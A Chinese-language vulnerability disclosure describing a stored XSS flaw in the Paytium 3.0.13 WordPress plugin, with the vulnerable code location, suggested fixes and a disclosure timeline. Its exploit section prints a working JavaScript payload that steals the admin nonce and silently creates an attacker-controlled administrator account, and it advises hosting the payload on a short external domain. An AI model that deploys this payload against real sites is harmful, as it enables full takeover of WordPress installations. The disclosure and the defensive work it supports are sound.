Paytium 3.0.13 WordPress插件存储型XSS漏洞
概念验证
背景
WordPress目前拥有60%的市场份额,是最常用的内容管理系统。默认情况下WordPress仅是一个博客平台,但通过安装插件可以将其转换为网店、众筹平台甚至读心器。
任何人都可以创建和发布WordPress插件,没有质量控制机制,唯一参考是其他用户的插件评价。已安装的WordPress插件中的漏洞可能导致严重问题:客户数据可能被盗取,甚至有人可以成为网站管理员。
Paytium WordPress插件
作者受朋友委托测试其网站安全性。该网站销售在线培训课程,使用名为Paytium的插件接收订阅用户的在线支付。
Paytium允许在WordPress页面中插入支付表单:简单的捐赠表单或包含客户姓名和邮箱地址的扩展表单。截至2019年9月,该插件有3000+安装量。
存储型XSS
漏洞发现
首先尝试在姓名字段中输入HTML代码,查看是否会被渲染。如果能够向该字段注入HTML,当网站管理员查看包含被篡改姓名的记录时,代码可能在WordPress管理员后端执行。
尝试在姓名字段加载图片:
ini
Jonathan Bouman概念验证 <img src="https://i.imgur.com/9eNikWc.jpg" alt="You've found waldo">HTML注入成功,这被称为存储型XSS。输入未经过适当验证,使我们能够添加自己的HTML内容。我们在WordPress后端获得了认证存储型XSS!
此外,Paytium插件还会向攻击者发送公共发票链接(发票ID经过哈希处理)。结果是公共存储型XSS。
漏洞代码
由于Paytium插件是免费的,我们可以识别漏洞代码。经过几分钟搜索,发现名为get_field_data_html()的函数,它直接输出存储的数据,没有进行HTML转义。该代码被WordPress后端用于显示订单概览。
这是一个不转义HTML值的echo语句。
从存储型XSS到完全接管WordPress
如果我们能静默添加具有预定义用户名和密码的新管理员用户呢?好主意!
WordPress有一个特殊页面,包含允许管理员邀请新用户并指定其角色的表单。
该表单受nonce保护。Nonce是浏览器发送给服务器的带有秘密值的隐藏参数。服务器使用它验证特定请求确实来自原始表单,否则恶意网站可能代表受害者强制提交表单------CSRF攻击。
服务器将此外部nonce添加到它渲染的每个表单中。外部恶意网站无法恢复此nonce值,默认情况下浏览器不允许一个域查看另一个域的HTML内容,因此没有Nonce我们就无法提交表单。
利用载荷
javascript
var ajaxRequest = new XMLHttpRequest,
requestURL = "/wp-admin/user-new.php",
nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, !1),
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText),
nonce = nonceMatch[1],
params = "action=createuser&_wpnonce_create-user=" + nonce + "&user_login=joax&email=attacker@email.com&pass1=helloworld123&pass2=helloworld123&role=administrator";
(ajaxRequest = new XMLHttpRequest).open("POST", requestURL, !0),
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
ajaxRequest.send(params);载荷包含两个阶段:
- 请求user-new.php页面并使用正则表达式提取nonce值
- 向user-new.php页面提交POST请求,包含预定义的登录详情和步骤1中的nonce
短域名的重要性
可以直接将脚本放在姓名字段的<script></script>标签中加载。但大多数字段有最大字符限制或不允许特殊字符。
建议将载荷放在文件(如1.js)中,并在互联网上的短域名上托管。越短越好,我们希望避免表单中的字符限制。因此获取一个3或4个字符长的域名并上传载荷!
上传到外部域时,确保其支持HTTPS,以避免浏览器关于"不安全内容"的警告。
最终载荷
html
<script src=//short.domain/1.js></script>结论
由于Paytium插件不正确的用户输入验证,我们能够将javascript注入WordPress后端。任何加载此javascript的WordPress管理员将自动添加具有我们预定义凭据的新管理员用户。这导致WordPress被完全接管。此外,我们能够通过未认证的发票URL查看存储型XSS载荷------对钓鱼者来说非常完美。
解决方案
-
WordPress默认支持用户输入验证;codex.wordpress.org/Validating_...
-
此外,WordPress应要求管理员在执行重要操作前手动输入密码。考虑在允许添加新管理员或安装插件之前需要密码提示。另一个解决方案可以是不同的访问级别,只想查看新订单?使用没有超级权限但仅够查看订单的用户登录。有关更多信息,请参阅角色和能力。
奖励
无
时间线
- 2019年7月31日:发现初始漏洞
- 2019年9月4日:撰写报告并通过电子邮件通知Paytium
- 2019年9月5日:Paytium要求更多细节
- 2019年9月6日:Paytium发布插件更新,未提及安全修复
- 2019年9月7日:Paytium发布插件更新,未提及安全修复
- 2019年9月28日:发现未认证存储型XSS漏洞,更新报告并电子邮件通知Paytium
- 2019年10月1日:Paytium回复报告评论,通知正在准备安全修复,本周晚些时候更新状态
- 2019年10月4日:添加关于WordPress角色和能力功能的内容,添加为特殊操作(如添加用户和安装插件)引入提示屏幕/手动输入的解决方案
- 2019年10月7日:Paytium发布修复并通过电子邮件通知客户
- 2020年5月12日:报告发布